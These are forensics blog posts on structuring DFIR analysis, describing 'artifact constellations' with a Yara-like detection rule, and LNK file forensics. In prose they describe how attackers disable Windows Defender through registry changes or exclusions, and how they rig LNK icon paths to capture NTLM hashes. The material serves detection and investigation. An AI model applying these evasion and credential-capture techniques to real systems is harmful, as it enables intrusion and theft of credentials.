Monday, April 12, 2021

On #DFIR Analysis, pt III - Benefits of a Structured Model

 In my previous post, I presented some of the basic design elements for a structured approach to describing artifact constellations, and leveraging them to further DFIR analysis. As much of this is new, I'm sure that this all sounds like a lot of work, and if you've read the other posts on this topic, you're probably wondering about the benefits to all this work. In this post, I'll take shot at netting out some of the more obvious benefits.

Maintaining Corporate Knowledge

Regardless of whether you're talking about an internal corporate position or a consulting role, analysts are going to see and learn new things based on their analysis. You're going to see new applications or techniques used, and perhaps even see the same threat actor making small changes to their TTPs due to some "stimulus". You may find new artifacts based on the configuration of the system, or what applications are installed. A number of years ago, a co-worker was investigating a system that happened to have LANDesk installed, along with the software monitoring module. They'd found that the LANDesk module maintains a listing of executables run, including the first run time, the last run time, and the user account responsible for the last execution, all of which mapped very well in to a timeline of system activity, making the resulting timeline much richer in context.

When something like this is found, how is that corporate knowledge currently maintained? In this case, the analyst wrote a RegRipper plugin, that still exists and is in use today. But how are organizations (both internal and consulting teams) maintaining a record of artifacts and constellations that analysts discover?

Maybe a better question is, are organizations doing this at all?  

For many organizations with a SOC capability, detections are written, often based on open reporting, and then tested and put into production. From there, those detections may be tuned; for internal teams, the tuning would be based on one infrastructure, but for MSS or consulting orgs, the tuning would be based on multiple (and likely an increasing number of) infrastructures. Those detections and their tuning are based on the data source (i.e., SIEM, EDR, or a combination), and serve to preserve corporate knowledge. The same approach can/should be taken with DFIR work, as well.

Consistency

One of the challenges inherent to large corporate teams, and perhaps more so to consulting teams, is that analysts all have their own way of doing things. I've mentioned previously that analysis is nothing more that an individual applying the breadth of their knowledge and experience to a data source. Very often, analysts will receive data for a case, and approach that data initially based on their own knowledge and experience. Given that each analyst has their own individual approach, the initial parsing of collected data can be a highly inefficient endeavor when viewed across the entire team. And because the approach is often based solely on the analyst's own individual experience, items of importance can be missed. 

What if each analyst were instead able to approach the data sources based not just on their own knowledge and experience, but the collective experience of the team, regardless of the "state" (i.e., on vacation/PTO, left the organization, working their own case, etc.) of the other analysts? What if we were to use a parsing process that was not based on the knowledge, experience and skill of one analyst but instead on that of all analysts, as well as perhaps some developers? That process would normalize all available data sources, regardless of the knowledge and experience of an individual analyst, and the enrichment and decoration phase would also be independent of the knowledge and skill of a single analyst.

Now, something like this does not obviate the need for analysts to be able to conduct their own analysis, in their own way, but it does significantly increase efficiency, as analysts are no longer manually parsing individual data sources, particularly those selected based upon their own experience. Instead, the data sources are being parsed, and then enriched and decorated through an automated means, one that is continually improved upon. This would also reduce costs associated with commercial licenses, as teams would not have to purchase each analyst licenses for several products (i.e., "...I prefer this product to this work, and this other product for these other things...").

By approaching the initial phases of analysis in such a manner, efficiency is significantly increased, cost goes way down, and consistency goes through the roof. This can be especially true for organizations that encounter similar issues often. For example, internal organizations protecting corporate assets may regularly see certain issues across the infrastructure, such as malicious downloads or phishing with weaponized attachments. Similarly, consulting organizations may regularly see certain types of issues (i.e., ransomware, BEC, etc.) based on their business and customer base. Having an automated means for collecting, parsing, and enriching known data sources, and presenting them to the analyst saves time and money, gets the analyst to conducting analysis sooner, and provides for much more consistent and timely investigations.

Artifacts in Isolation

Deep within DFIR, behind the curtains and under the dust ruffle, when we see what really goes on, we often see analysts relying far too much on single sources of data or single artifacts for their analysis, in isolation from each other. This is very often the result of allowing analysts to "do their own thing", which while sounding like an authoritative way to conduct business, is highly inefficient and fraught with mistakes.

Not long ago, I heard a speaker at a presentation state that they'd based their determination of the "window of compromise" on a single data point, and one that had been misinterpreted. They'd stated that the ShimCache/AppCompatCache timestamp for a binary was the "time of execution", and extended the "window of compromise" in their report from a few weeks to four years, without taking time stomping into account. After the presentation was over, I had a chat with the speaker and walked through my reasoning. Unfortunately, the case they'd presented on had been completed (and adjudicated) two years prior to the presentation. For this case, the victim had been levied a fine based on the "window of compromise".

Very often, we'll see analysts referring to a single artifact (ShimCache entry, perhaps an entry in the AmCache.hve file, etc.) as definitive proof of execution. This is perhaps an understanding based on over-simplification of the nature of the artifact, and without corresponding artifacts from the constellation, will lead to inaccurate findings. It is often not until we peel back the layers of the analysis "onion" that it becomes evident that the finding, as well as the accumulated findings of the incident, were incorrectly based on individual artifacts, from data sources viewed in isolation from other pertinent data sources. Further, the nature of those artifacts being misinterpreted; rather than demonstrating program execution, they simply illustrate the existence of a file on the system.

Summary

Over the years that I've been doing DFIR work, little in the way of "analysis" has changed. We started out with getting a few hard drives that we imaged and analyzed, to going on-site to do collections of images, then to doing triage collections to scope the systems that needed to be analyzed. We then extended our reach further through the use of EDR telemetry, but analysis still came down to individual analysts applying just their own knowledge and experience to collected data sources. It's time we change this model, and leverage the capabilities we have on hand in order to provide more consistent, efficient, accurate, and timely analysis.

Saturday, April 10, 2021

On #DFIR Analysis, pt II - Describing Artifact Constellations

 I've been putting some serious thought into the topic of a new #DFIR model, and in an effort to extend and expand upon my previous post a bit, I wanted to take the opportunity to document and share some of my latest thoughts.

I've discussed toolmarks and artifact constellations previously in this blog, and how they apply to attribution. In discussing a new #DFIR model, the question that arises is, how do we describe an artifact or toolmark constellation in a structured manner, so that it can be communicated and shared?  

Of course, the next step after that, once we have a structured format for describing these constellations, is automating the sharing and "machine ingestion" of these constellation descriptions. But before we get ahead of ourselves, let's discuss a possible structure a bit more. 

The New #DFIR Model

First off, to orient ourselves, figure 1 illustrates the proposed "new" #DFIR model from my previous blog post. We still have the collect, parse, and enrich/decorate phases prior to the output and data going to the analyst, but in this case, I've highlighted the "enrich/decorate" phase with a red outline, as that is where the artifact constellations would be identified.

Fig 1: New DFIR Model 
We can assume that we would start off by applying some known constellation descriptions to the parsed data during the "enrich/decorate" phase, so the process of identifying a toolmark constellation should also include some means of pulling information from the constellation, as well as "marking" or "tagging" the constellation in some manner, or facilitating some other means of notifying the analyst. From there, the expectation would be that new constellations would be defined and described through analysis, as well as through open sources, and applied to the process.

We're going to start "small" in this case, so that we can build on the structure later. What I mean by that is that we're going to start with just DFIR data; that is, data collected as either a full disk acquisition, or as part of triage response to an identified incident. We're going to start here because the data is fairly consistent across Windows systems at this point, and we can add EDR telemetry and input from a SIEM framework at a later date. So, just for the sake of  this discussion, we're going to start with DFIR data.

Describing Artifact Constellations

Let's start by looking a common artifact constellation, one for disabling Windows Defender. We know that there are a number of different ways to go about disabling Windows Defender, and that regardless of the size and composition of the artifact constellation they all result in the same MITRE ATT&CK sub-technique. One way to go about disabling Windows Defender is through the use of Defender Control, a GUI-based tool. As this is a GUI-based tool, the threat actor would need to have shell-based access to the system, such through a local or remote (Terminal Services/RDP) login. Beyond that point, the artifact constellation would look like:
  • UserAssist entry in the NTUSER.DAT indicating Defender Control was launched
  • Prefetch file created for Defender Control (file system/MFT; not for Windows server systems)
  • Registry values added/modified in the Software hive
  • "Microsoft-Windows-Windows Defender%4Operational.evtx" event records generated
Again, this constellation is based solely on DFIR or triage data collected from an endpoint. Notice that I point out that one artifact in the constellation (i.e., the Prefetch file) would not be available on Windows server systems. This tells us that when working with artifact constellations, we need to keep in mind that not all of the artifacts may be available, for a variety of reasons (i.e., version of Windows, system configuration, installed applications, passage of time, etc.). Other artifacts that may be available but are also heavily dependent upon the configuration of the endpoint itself include (but are not limited to) a Security-Auditing/4688 event in the Security Event Log pertaining to Defender Control, indicating the launch of the application, or possibly a Sysmon/1 event pertaining to Defender Control, again indicating the launch of the application. Again, the availability of these artifacts depends upon the specific nature and configuration of the endpoint system.

Another means to achieve the same end, albeit without requiring shell-based access, is with a batch file that modifies the specific Registry values (Defender Control modifies two Registry values) via the native LOLBIN, reg.exe. In this case, the artifact constellation would not need to (although it may be) be preceded by a Security-Auditing/4624 (login) event of either type 2 (console) or type 10 (remote). Further, there would be no expectation of a UserAssist entry (no GUI tool needs to be launched), and the Prefetch file creation/modification would be for reg.exe, rather than Defender Control.  However, the remaining two artifacts in the constellation would likely remain the same.

Fig 2: WinDefend Exclusions
Of course, yet another means for "disabling Windows Defender" could be as simple as adding an exclusion to the tool, in any one or more of the five subkeys illustrated in figure 2. For example, we've seen threat actors create exceptions for any file ending in ".exe", found in specific paths, or any process such as Powershell.

The point is that while there are different ways to achieve the same end, each method has its own unique toolmark constellation, and the constellations could then be used to apply attribution.  For example, the first method for disabling Windows Defender described above was observed being used by the Snatch ransomware threat actors during several attacks in May/June 2020. Something like this would not be exclusive, of course, as a toolmark constellation could be applied to more than one threat actor or group. After all, most of what we refer to as "threat actor groups" are simply how we cluster IOCs and TTPs, and a toolmark constellation is a cluster of artifacts associated with the conduct of particular activity. However, these constellations can be applied to attribution.

A Notional Description Structure

At this point, a couple of thoughts or ideas jump out at me.  First, the individual artifacts within the constellation can be listed in a fashion similar to what's seen in Yara rules, with similar "strings" based upon the source. Remember, by the time we're to the "enrich/decorate" phase, we've already normalized the disparate data sources into a common structure, perhaps something similar to the five-field TLN format used in (my) timelines. The time field of the structure would allow us to identify artifacts within a specified temporal proximity, and each description field would need to be treated or handled (that is, itself parsed) differently based upon the source field. The source field from the normalized structure could be used in a similar manner as the various 'string' identifiers in Yara (i.e., 'ascii', 'nocase', 'wide', etc.) in that they would identify the specific means by which the description field should be addressed. 

Some elements of the artifact constellation may not be required, and this could easily be addressed through something similar to Yara 'conditions', in that the various artifacts could be grouped with parens, as well as 'and' and 'or', identifying those artifacts that may not be required for the constellation to be effective, although not complete. From the above examples, the Registry values being modified would be "required", as without them, Windows Defender would not be disabled. However, a Prefetch file would not be "required", particularly when the platform being analyzed is a Windows server. This could be addressed through the "condition" statement used in Yara rules, and a desirable side effect of having a "scoring value" would be that an identified constellation would then have something akin to a "confidence rating", similar to what is seen on sites such as VirusTotal (i.e., "this sample was identified as malicious by 32/69 AV engines"). For example, from the above bulleted artifacts that make up the illustrated constellation, the following values might be applied:

  • Required - +1
  • Not required - +1, if present
  • +1 for each of the values, depending upon the value data
  • +1 for each event record
If all elements of the constellation are found within a defined temporal proximity, then the "confidence rating" would be 6/6. All of this could be handled automatically by the scanning engine itself.

A notional example constellation description based on something similar to Yara might then look something like the following:

strings:

    $str1 = UserAssist entry for Defender Control
    $str2 = Prefetch file for Defender Control
    $str3 = Windows Defender DisableAntiSpyware value = 1
    $str4 = Windows Defender event ID 5010 generated
    $str5 = Windows Defender DisableRealtimeMonitoring value = 1
    $str6 = Windows Defender event ID 5001 generated

condition:

    $str1 or $str2 and ($str3 and $str4 and $str5 and $str6);

Again, temporal proximity/dispersion would need to be addressed (most likely within the scanning engine itself), either with an automatic 'value' set, or by providing a user-defined value within the rule metadata. Additionally, the order of the individual artifacts would be important, as well. You wouldn't want to run this rule and in the output find that $str1 was found 8 days after the conditions for $str3 and $str5 being met. Given that the five-field TLN format includes a time stamp as its first field, it would be pretty trivial to compute a temporal "Hamming distance", of sorts, a well as ensure proper sequencing of the artifacts or toolmarks themselves.  That is to say that $str1 should appear prior to $str3, rather than after it, but not so far so as to be unreasonable and create a false positive detection.

Finally, similar to Yara rules, the rule name would be identified in the output, along with a "confidence rating" of 6/6 for a Windows 10 system (assuming all artifacts in the cluster were available), or 5/6 for Windows Server 2019.

Counter-Forensics

Something else that we need to account for when addressing artifact constellations is counter-forensics, even that which is unintentional, such as the passage of time. Specifically, how do we deal with identifying artifact constellations when artifacts have been removed, such as application prefetching being disabled on Windows 10 (which itself may be part of a different artifact constellation), or files being deleted, or something like CCleaner being run?

Maybe a better question is, do we even need to address this circumstance? After all, the intention here is not to address every possible eventuality or possible circumstance, and we can create artifact constellations for various Windows functionality being disabled (or enabled).

Thursday, April 01, 2021

LNK Files, Again

 I ran across SharpWebServer via Twitter recently...the first line of the readme.md file states, "A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes." I thought this was fascinating because it ties directly to a technique MITRE refers to as "Forced Authentication".  What this means is that a threat actor can (and has...we'll get to that shortly) modify Windows shortcut/LNK files such that the iconfilename field points to an external resource. What happens is that when LNK file is launched, Explorer will reach out to the external resource and attempt to authenticate, sending NTLM hashes across the wire.  As such, SharpWebServer is built to capture those hashes.

What this means is that a threat actor can gain access to an infrastructure, and as has been observed, use various means to maintain persistence...drop backdoors or RATs, create accounts on Internet-facing systems, etc.  However, many (albeit not all) of these means of persistence can be overcome via the judicious use of AV, EDR monitoring, and a universal password change.

Modifying the iconfilename field of an LNK file is a means of persisting beyond password changes, because even after passwords are change, the updated hashes will be sent across the wire.

Now, I did say earlier that this has been used before, and it has.  CISA Alert TA18-074A includes a section named "Persistence through LNK file manipulation". 

Note that from the alert, when looking at the "Contents of enu.cmd", "Persistence through LNK file manipulation", and "Registry Modification" sections, we can see a pretty comprehensive set of toolmarks associated with this threat actor.  This is excellent intrusion intelligence, and should be incorporated into any and all #DFIR parsing, enrichment and decoration, as well as threat hunting.

However, things are even better! This tweet from bohops illustrates how to apply this technique to MSWord docs.

On #DFIR Analysis

I wanted to take the opportunity to discuss DFIR analysis; when discussing #DFIR analysis, we have to ask the question, "what _is_ "analysis"?"

In most cases, what we call analysis is really just parsing some data source (or sources) and either viewing the output of the tools, or running keyword searches.  When this is the entire process, it is not analysis...it's running keyword searches. Don't get me wrong, there is nothing wrong with keyword searches, as they're a great way to orient yourself to the data and provide pivot points into further analysis.  However, these searches should not be considered the end of your analysis; rather, they are simply be beginning, or at least early stages of the analysis. The issue is that parsing data sources in isolation from each other and just running keyword searches in an attempt to conduct "analysis" is insufficient for the task, simply due to the fact that the results are missing context.

We "do analysis" when we take in data sources, perhaps apply some parsing, and then apply our knowledge and experience to those data sources.  This is pretty much how it's worked since I got started in the field over 20 yrs ago, and I'll admit, I was just following what I had seen being done before me.  Very often, this "apply our knowledge and experience" process has been abstracted through a commonly used commercial forensic analysis tool or framework (i.e., EnCase, X-Ways, FTK, Autopsy, to name a few...). 

The process of collecting data from systems has been addressed by many at this point. There are a number of both free and commercially available tools for collecting information from systems. As such, all analysts need to do at this point is keep up with changes and updates to the target operating systems and applications, and ensure the appropriate sources are included in their collections.

Over time, some have worked to make the parsing and analysis process more efficient, by automating various aspects of the process, by either setting up processes via the commercial tools, or by using some external means.  For example, looking way back in the mists of time when Chris "CPBeefcake" Pogue and I were working PCI engagements as part of the IBM ISS ERS team, we worked to automate (as much as possible) the various searches (hashes, files names, path names) required by Visa (at the time) so that they were done in as complete, accurate, and consistent manner as possible. Further, tools such as plaso, RegRipper, and others provide a great deal of (albeit incomplete) parsing capability. This is not simply restricted to freely available tools; back when I was using commercial tool suites, I extended my use of ProDiscover, while I watched others simply use other commercial tools as they were "out of the box".

A great example of extending something already available in order to meet your needs can be found in this FireEye blog post, where the authors state:

We adapted the...parsing code to make it more robust and support all features necessary for parsing QMGR databases.

Overall, a broad, common issue with both collection and parsing tools is not with the tools themselves, but how they're viewed and used.  Analysts using such tools very often do little really identify their own needs, and then to update or extend those tools, looking at their interaction with the tools as the end of their involvement in the process, rather than the beginning.

So, while this automates some tasks, the actual analysis is still left to the experience and knowledge of the individual analyst, and for the most part, does not extend much beyond that. This includes not only what data sources and artifacts to look to, but also the context and meaning of those (and other) data sources and artifacts. However, as Jim Mattis stated in his book, "Call Sign Chaos", "...your personal experiences alone are not broad enough to sustain you." While this statement was made specifically within the context of a warfighter, the same thing is true for DFIR analysts. So, the question becomes, how can we implement something like this in DFIR, how do we broaden the scope of our own personal experiences, and build up the knowledge and experience of all analysts, across the board, in a consistent manner?

The answer is that, much like McChrystal's "Team of Teams", we need a new model.

Fig 1: Process Schematic
A New DFIR Model

Back in the day...I love saying that, because I'm at the point in my career where I can..."DFIR" meant getting a call and going on-site to collect data, be it images, logs, triage data, etc. 

As larger, more extensive incidents were recognized and became more commonplace, there was a shift in the industry to where some DFIR consulting firms were providing EDR tools to the customer to install, the telemetry for which reported back to a SOC. Initial triage and scoping could occur either prior to an analyst arriving on-site, or the entire engagement could be run, from a technical perspective, remotely.  

Whether the engagement starts with a SOC alert, or with a customer calling for DFIR support and EDR being pushed out, at some point, data will need to be collected from a subset of systems for more extensive analysis. EDR telemetry alone does not provide all the visibility we need to respond to incidents, and as such, collecting triage data is a very valuable part of the overall process.  Data is collected, parsed, and then "analyzed". For the most part, there's been a great deal of work in this area, including here, and here. The point is that there have been more than a few variations of tools to collect triage data from live Windows systems.

Where the DFIR industry, in the general sense, falls short in this process (see fig 1) is right around the "analysis" phase. This is due to the fact that, again, "analysis" consists of each analyst applying the sum total of their own knowledge and experience to the data sources (triage data collected from systems, log data, EDR telemetry, etc.). 

Why does it "fall short"?  Well, I'll be the first to tell you, I don't know everything. I've seen a lot of ransomware and targeted ("nation state", "cybercrime") threat actors during my time, but I haven't seen all of them.  Nor have I ever done a BEC engagement. Ever. I haven't avoided them or turned them down, I've just never encountered one. This means that the analysis phase of the process is where things fall short. 

So how do we fix that?  One way is that if I take everything I learn...new findings, lessons learned, anything I find via open sources...and "bake it back into" the overall process via a feedback loop.  Now, this is something that I've done partially through several tools that I use regularly, including RegRipper, eventmap.txt, etc. This way, I don't have to rely on my fallible memory; instead, I add this new information to the automated process, so that when I parse data sources, I also "enrich" and "decorate" appropriate fields.  I'm already automating the parsing so that I don't miss something important, and now, I can increase visibility and context by automating the enrichment and decoration phase.

Now, imagine how powerful this would be if we took several steps.  First, we make this available to all analysts on the team. What one analyst learns instantly becomes available to all analysts, as the experience and knowledge of one is shared with many. Steve learns something new, and it's immediately available to David, Emily, Margo, and all of the other analysts. You do not have to wait until Steve works directly with Emily on an engagement, and you do not have to hope that the subject comes up. The great thing is that if you make this part of the DFIR culture, it works even if Steve goes on paternity leave or a family vacation, and it persists beyond any one analyst leaving the organization entirely.

Second, we further extend our enrichment and decoration capability by incorporating threat intelligence. If we do so initially using open reporting, we can greatly extend that open reporting by providing actual intrusion intelligence. We can use open reporting to take what others see on engagements that we have yet to experience, and use that to extend our own experience. Further, the threat intelligence produced (if that's something you're doing) now incorporates actual intrusion intel, which is tied directly to on-system artifacts. For example, while open reporting may state that a particular threat actor group "disables Windows Defender", intrusion intel from those incidents will tell us how they do so, and when during the attack cycle they take these actions. This can provide insight into better tooling and visibility, earlier detection of threat actors, and a much more granular picture of what occurred on the system.

Third, because this is all tied to the SOC, we can further extend our capabilities by baking new DFIR findings back into the SOC in the form of detections. This feedback loop leads to higher fidelity detections that provide greater context to the SOC alerts themselves. A great example of this feedback process can be seen here; while this blog post just passed it's 5th birthday, all that means is that the process worked then and is still equally, if not more, valid today. The use of WMI persistence led directly to the creation of new high-fidelity SOC EDR detections, which provided significantly greater efficacy and context.

While everyone else is talking about 'big data', or the 'lack of cybersecurity skills', there is a simple approach to addressing those issues, and more...all we need to do is change the business model used to drive DFIR, and change the DFIR culture.